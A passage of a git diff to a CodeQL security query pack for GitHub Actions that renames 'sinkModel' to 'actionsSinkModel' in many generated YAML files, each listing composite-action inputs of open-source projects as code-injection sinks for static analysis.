a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 9ddc6606a6d..35474e6c68f 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index cd04e9c8b34..ce961ee6a75 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index d986c331226..9ad4bb30666 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 9b30c6599c1..5fca46427e0 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 0089d9ca75d..9f0fecbe10b 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index d64d7c38a01..cadf01dbff1 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 55a87e2df67..ec4fc1da053 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 158aafbd115..e6530a19d97 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index ff12a54e97a..0bae4e91cde 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 1a92afe11a4..0acb53ba1d3 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 38f2399b368..f1b755e796b 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 36e983b8039..7d1733d647a 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 006a53e8376..4bf33c9a343 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 5410cb3ff30..9ca004a7c15 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 124b3cf2a5a..fc3870d89a8 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 8542583f3d9..1d621562771 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index e85e58fb40a..f09b364127e 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index d2005f3788a..56e7b814231 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 7340dfccdd0..9f953b32ab1 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 70022866bdd..257b77bc2c3 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index f7bd43cbc1e..49f2f86907f 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index d85a35580b6..1e33c5e540a 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index ee0b51c72b4..cfbf15549c4 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 524a1f54ae4..24730af3d77 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] - ["quay/clair", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 310f11ed160..6be5abd09dd 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 441b824581c..145b6f0d0e3 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 19f9f7a03bb..c8b05bfd904 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 1ca71afacc7..04c218a76c1 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9f0ff2c86de..5447d4b7e2e 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index abb6c432aef..825ce27511d 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 6548880f59e..8f3e49c9768 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 5401d176051..1937367debc 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 70cf81f1b78..01b77b7ccc6 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index eccccba83fe..edbd28d401b 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index b7133aae304..4b31bd66c5a 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 26d7b448269..a186fa070b0 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 7600cd4bdde..92ee2971e3a 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index dd79b0845dd..07b8e96bfe2 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 71bdd001458..2a2a5baab45 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 3b3262f93a9..274fab01e92 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index b30d898dcc1..3671de9e58a 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 963518a3478..2ef34dac8ba 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 979a9aca5c2..d76f20031e7 100644 
--- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index b180a319baa..eccb5dae2bd 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index fb5fa4d8e4e..3cbd3330ccd 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index cb9faef2bf6..73c9c1f24a2 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index e7eb6b732ff..90c4f699308 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index a1b1a4b71e8..ed4e8820c99 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 2463b4a1d16..df51b9fe4c8 100644 
